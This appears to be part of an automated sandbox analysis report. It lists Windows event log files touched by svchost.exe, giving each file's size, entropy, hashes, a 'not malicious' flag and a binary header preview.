Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.0991129918473215
Encrypted:	false
SSDEEP:	384:ZhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28l:ZbCyhLfIIo
MD5:	5D11CB9C5203BAF048611D9EE24906EF
SHA1:	233E6CA4D1BFC749AC002D5D86CB5D2EDCF5B7C0
SHA-256:	D4F59C2F407784B8952B08A63F031BB4FB83B3E07DC59ECC378F896567CB887C
SHA-512:	583990F3846AF3D0652CC4258DC603D9190E9544265302A95D6160A869F4200C0ED7A85891A6F3CC956713D013522CEE5C536B1BA9BA48B3FBBB77AF25A872BC
Malicious:	false
Preview:	ElfChnk.........K...............K...........H...0...... .....................................................................\|..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n................................................{......................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.318227577210551
Encrypted:	false
SSDEEP:	768:5cMhFBuyKskZljdoKXjtT/r18rQXn8BiJCF9Hhr:CMhFBuV
MD5:	5C633A280FB6049ED65FB3D9FB6ED41D
SHA1:	EA8D9B84B69F08E866CEE93019E7D9D2F2055666
SHA-256:	C173BD37497EC6CC0B01BDBD0F2813644D398457279644AEDA0F9925E546091F
SHA-512:	3E040021C7ABF4B9242BA0851F377EB0B077A1CFCAC0E012A4AB7E2551157BF7AC70E979A6F7225A3E260D5C393DBACAA78831C0BC46356C966A524271CC57CF
Malicious:	false
Preview:	ElfChnk.........M...............M..............8...^..Q....................................................................q...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A.........................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.894276729929611
Encrypted:	false
SSDEEP:	768:8AiyQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZavAFDtCwvhr9LHe:QHur
MD5:	D72F77DC863118FEB7F92DEDAB556112
SHA1:	495DE9862DC6A0293B3BA190232E6F3503E2CF7C
SHA-256:	DCA7462E1BC2C1BBA0A80ED09EA2A4EF534E96F0BB5980A5E614FE3820434062
SHA-512:	792E81A5C2DAF913E256EE74E9172F2F760F5C7A02B4B12E2B7774C6467080D88B540D8A850595AF47E3DC516256CD4781B5F1C192EA1016E6E8C6B97B92A0E6
Malicious:	false
Preview:	ElfChnk.v.......x.......v.......x...........P...`...2m.N....................................................................@...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..@...v........T..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9991173293907214
Encrypted:	false
SSDEEP:	384:ih1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:iMAP1Qa5AgfQQzy
MD5:	136C76E352B55506EBDFC639C5C5E0AE
SHA1:	282AB441407769A38D5BEDD002011A1CDF08EBB5
SHA-256:	35F4E45C5372A7607858D64133D8F47A0F4BA7CFC431FCEB2FB03CA17F94F6ED
SHA-512:	AA8C840BBBEE9632F9FFA006E51C892E9621CEB4825DE28C751A7BB933A96A303D31F676E0260C7097A3013EBC27CC281C3017F3FC035B09077F0BDF681AF161
Malicious:	false
Preview:	ElfChnk......................................c...f...{PX.......................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&.......\......;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.441017411582523
Encrypted:	false
SSDEEP:	384:BhdERE5EUELEvE/EpEbEmEfEjoPjE4FEqEZEVEiEUhqEd/2EME0EHE+EIy4qEQi0:BQoPjvh7jhHl7lzuzbCN7y+D
MD5:	8D30244BF7119CFA2F8A7A5AF8FCDAB7
SHA1:	F0827675265E0DF98A4967D8A539D476551DCAA6
SHA-256:	489E810931FD45E6D7620FE65EBF1F1A66235B06E572C2C293BD080EE1C8E1ED
SHA-512:	C71504A8F8D370825FC0C8C605B9F7217EFF2025838ED8FDF3F04CCC41E86751659BB60C7E79C48BBDDC1089C771DD16A193C107DDE4A1487F037BB2FC1455B8
Malicious:	false
Preview:	ElfChnk.q...............q....................i..Pk..buI......................................................................o._................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F........................................7...(..................};...........?..M=.......9..............U..&....$..........."..............=1......*......q........\|.xf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.2803522685445374
Encrypted:	false
SSDEEP:	384:RhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl0:R1T4hZovIZC7
MD5:	4A70DB2946C129829BEDDB2E147FBE04
SHA1:	4D3255FABE0E857840591072D9370047FDDFB83A
SHA-256:	C10981A84E3884E62907E34159FB7AA2D1F908C3E328D8D8B942B9934DFDE09C
SHA-512:	7FDBE43D4773CBC17A3879CBC012F8C9FC823529DDF6FE5E10C623B2D7AA89159132F10FE01C0632B6F8F92A0C474C67EF1D5DA4DC2EDC3CA5499D6220922AA4
Malicious:	false
Preview:	ElfChnk.........k...............k...........................................................................................<../................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.445920452673848
Encrypted:	false
SSDEEP:	384:ihFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDff:izSKEqsMuy6SbKrTPpOIKm
MD5:	21B26F726BBEBA7FD5C4C45386FC544F
SHA1:	F6CC3E80D2AD9D2F420C42D7DA3AA3C48C9D956A
SHA-256:	63E1A62EA280BF1B031E1C98FBF21FF88795119983E5BC96C036B8EEF30D325D
SHA-512:	A28CB789E4967DB231359AFE7D221C55A57FB56EF899997EBAA0F79EBD92D34547530A64B4B5492400ABFC81631E5ED792D47B836525E5E1583BA6F656062DD5
Malicious:	false
Preview:	ElfChnk.........L...............L......................f....................................................................s.J.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........................................f......................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.1562721664799103
Encrypted:	false
SSDEEP:	384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3z2:Bmw9g3LQ
MD5:	B2C3D7448B237C268D23FE1A78777AA5
SHA1:	6C3A39325392F2B088C00CDC1763268F15832447
SHA-256:	05BC150DCBE6B62CE7D2A9CB8F706130DF70BABC54752199B02B4C91ACEE1C4E
SHA-512:	F9286BC0FC6DB6C52295C0292E2BF732C010F2D542999085F999501AC555C317FB1AFED9A2FF2DF6D91913373D0A32D2307C707381419883F5605F1D67DEE70E
Malicious:	false
Preview:	ElfChnk.........6...............6...........(o...p....Zo....................................................................ZU.#................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#.......................................^^......................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9195298486885948
Encrypted:	false
SSDEEP:	384:3hPIRbiY8SIUIi0IsIGIAICI5I2IBIaIKI+I3lKaZrIVlKaZOITTIwI:3LQ9KC8KCV
MD5:	D4A00CC59E964B7DFD6EFDB643322E9E
SHA1:	7307AF862B22D743BF6B531829DABE041E9F1F92
SHA-256:	49414D51861772E0899416FE42628F8641622E9F793F435DE7F0118F45EDE065
SHA-512:	51663BF2E9D8F1FA3BA6B87918CD36A02AFC2F53FF89F3ED104A4B4129682F0947DC825912A81844E2D25083E7249CE7C1EE8F899D847F511AB20B0404B22F27
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...........x...86..........................................................................E.U.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...K.......1..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 128, DIRTY
Category:	modified
Size (bytes):	1052672
Entropy (8bit):	0.4508192875531036
Encrypted:	false
SSDEEP:	768:ZnKx9PIEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWD4gm/Rg6j:Rp
MD5:	C1ADB61FD0BE545CD03CDAC76FD2321F
SHA1:	CEBD85B29002AED60DBFAA93F8ABDD5B4840EEB0
SHA-256:	0E25540CA2ACA178D123DD4AA71FE8B08BBFEC5D820F4FFECCFB70EE115C0232
SHA-512:	39B9A0766B8F9240B16A8BE2AFC381E64DD18D2D8831BAEDDC16EFABDD330A00868B1B2FB3921C2691CD0B364E193ECDA5D4C3268016A5E569FF9E928BE3C473
Malicious:	false
Preview:	ElfFile.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.119748237037944
Encrypted:	false
SSDEEP:	384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpRaMRlM7kMGU:SeJB
MD5:	D1CFC256BC075DC75D7FD92207C9C0F2
SHA1:	587C19CF65305AD470E82AB5A1ED5B2E36472625
SHA-256:	6C0365C674BCE55E0C49A62D23782660D34ECB388A8A7418AD9A75DFD36E612E
SHA-512:	85F88C26274975D8EB8DDC65297064427A103B557712BD46F459B8E26A1B7E38DA3B4674920FA61476D108BA3B9846430F59AA82926AFEBDCE92B25A527331A3
Malicious:	false
Preview:	ElfChnk......................................1..p3..\q........................................................................_U........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................,......................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.182756017330751
Encrypted:	false
SSDEEP:	384:9hk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1B:9BjdjP0csdHkp
MD5:	9BA8F6B60705B6A27084436D1D4370AD
SHA1:	DCAFEC9C3F76CCE3FF65F8FED6E373B863780B6E
SHA-256:	580E71D95D6201104E37944E8A0A6596869D6C8A0CA2CD3B704FEFC9D319C957
SHA-512:	BFBAEA71174AEE5233857BFDB4427C59D945A3797EA6F5D02708807321E0ADD12ED632BAA3C5E59141CFEF108FADE90315AB670BB960A281D0E95DB18C4976A4
Malicious:	false
Preview:	ElfChnk.....................................8.......I#.e......................................................................hB................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.1664631857982
Encrypted:	false
SSDEEP:	384:s3hDIEQAGxIHIFIWwIfyITMIcIZIMIf0ITEIAI/IuIGvqIfIOIOIv0IfCOiIThI6:s3ZxGe6dm
MD5:	3B1AC483EC9905DB0C1D0E675CB55DCA
SHA1:	FA2D06F63A2D2E9229D38A4B272CAA97BCE1BAB7
SHA-256:	089DD08CC07D9DBF14CA3044E8F591CA1AF2C8A57E182D72365F8EFC26CBA53C
SHA-512:	89CB9D1D32296E58B6A2FD9519379D529A24D3968E7036A502709D8167A8F69E541845E181AC520A2FCB56817A075F7BD3093A6595C09DE2BCFE17BE76F1E838
Malicious:	false
Preview:	ElfChnk.T...............T............................D}.....................................................................,..P........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1............................V...........6..........................**......T.......B..d..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.800476718060657
Encrypted:	false
SSDEEP:	384:7h6iIvcImIvITIQIoIoI3IEIMIoIBIzI9IwWInIE1IFtI:7oxqV
MD5:	F25E3A5940E51F9A49AC271DE377E2C1
SHA1:	38EB4D0BCB8EA4C72C03AD88CF9B7136C39BCDC5
SHA-256:	D2B29761907A72BE3EC03C586D87729FF91EE3D9A6CF39319FD90A1977602663
SHA-512:	CADA8EFD9868D26AA1B4DBC5A5BDD31E624547E5755ED7B413EA74D69AB731B000BB2B8FCBDD3027FDA278A7D69058DF4BE3BAEE5AB253055C70EDE7D3AA9993
Malicious:	false
Preview:	ElfChnk.....................................X"...#.../......................................................................V)..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.999140584854273
Encrypted:	false
SSDEEP:	768:q4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH135:o
MD5:	5234109523F4243D8DFEEAFD9202BC60
SHA1:	49A4B237FB8BEE3A2BDAA0C20A579E06D2645F65
SHA-256:	D4CE68FD0E970CC24971E8258B962534A3BF7CB1F1E6209AA0BB1D09F4FB80E6
SHA-512:	C2CC9A4E7282BF37C4113FADBA4F7FDD1D2094B8F40FE145C58A5ABEE4A90BCD55FBD8876415BD9140EBEE36314D02FEE5525076B539BB5AA01FB1D32058B426
Malicious:	false
Preview:	ElfChnk.....................................(...8...\|.........................................................................6................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	76320
Entropy (8bit):	4.029279961362116
Encrypted:	false
SSDEEP:	768:uaRow407SZRcZv76NcRkpHrWbGyYKQc90X9ztputDBjV8k+i7eUtHpoVWWejRKvh:UztputDBjV8k+i7PtHpoVWo
MD5:	FA1CAA68A5988248B5787DC1DEA9CD3C
SHA1:	566F8B2D156E91D9DC308735EF6D83D78094CDA2
SHA-256:	12A3A381CBBFE40F3CD9FF015B3A21079827473360FD0B6731E5AF7939CC2258
SHA-512:	BD124B39E004B9EF3E7A4326EBD1F1D5E760D5F1F850F5745A15FA6C73AB1DA41FD3EE9BFE98CC30A2A11B9AE4AA50E05E0F7B2AE8F2A08397CF091E2EE6439A
Malicious:	false
Preview:	ElfChnk.................J.......O...........0........!f.........................................................................................2...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..`...J.......+.w..1.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.419032545541079
Encrypted:	false
SSDEEP:	384:BhWKyzK5SK+jKLSKDlKMAwpTKZDGKPK9KyKJSK2KVKzKAGP1K6GSKzKhMK7KS3K9:BIgpCnz/Gh4wRub4Z2LqQ6QE
MD5:	822F854D66FEFEEB2924E69852576E0A
SHA1:	90D085D1E72EC8354B42E986346F686A21AF1377
SHA-256:	4F03F811C2FDAE7DFB65037D96439139F4C055FAC42E44E0DBCE21BBD6CBE7E5
SHA-512:	C693C88BFE1AAF1430E3660FCDF8DF166B0CA78220153E78A471C42A922B75CB0FDD929455568BDAFA3B7D571F209950D06B891B734124A9441E40FA58546947
Malicious:	false
Preview:	ElfChnk.........[...............[...............H...]./......................................................................?wC................p...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................'f.......D...T.......................s..........O....p...h............../$...............}..**................qdf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.760021633915647
Encrypted:	false
SSDEEP:	384:4hP8o8Z85848V8M8g8D8R8E8C888FB8J8a8:4R
MD5:	91415CB1A68CB19DCDB017402AAEB51E
SHA1:	EEEB808B9D0DFB3DB247AA10B64290A5029EAB89
SHA-256:	EDEE7AB462BF2D986393D24304BDEF02415A6E0483DE793BD452E169B7D08170
SHA-512:	C2F5AF43559DCE7BB66ABE305DF2DCFF0C95E2CF431D8DD0B6A02E216C8F4329C3B888BF2BF378918851A3066976FCEE745593B60970E5B9843535E6301E5BA0
Malicious:	false
Preview:	ElfChnk.........................................8!..$.0v....................................................................>...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.7642287366138047
Encrypted:	false
SSDEEP:	1536:HXhhUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:HX/nS
MD5:	EB0F3C0C854FB5C701A0887F1BB4D397
SHA1:	160BE6E94DAC6032A55870B7986C15D0349F5174
SHA-256:	F6C427F87861DB832A3CDBDFD6FCDA2CB3AEB40D0FAF01B83DCF11DE06E307FC
SHA-512:	B20EA8AEB6F822A1C2C206EFB6E6F7D6AB65B922578BDDC67D18D2E402D92966E7828B942F81739BD605C1E382C3C256C84512C854E106DCE099EBA7250D5266
Malicious:	false
Preview:	ElfChnk.........'...............'............I...J...[.,......................................................................F.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................>..............O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4373812410985773
Encrypted:	false
SSDEEP:	768:50VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OaafcmafEMXW0OWkjWr:jcEt
MD5:	5166C2E32BD35C5E8D122799E53B4EA3
SHA1:	628619C0E31F8C29ED260FCC063CD27935ACC25C
SHA-256:	433A96E20784F1E6FB099FA4AB020EEA75BB22EEBC7D969497A31ABCB9B415AB
SHA-512:	E5EA93AA871264E180BBC67008D7AA1012CDCAC74D22D10B47F1849380E092DF2FD798C7143DD3CAB5D9192EB4A89BB0EE60DA662E626923551906AB8F31DFD9
Malicious:	false
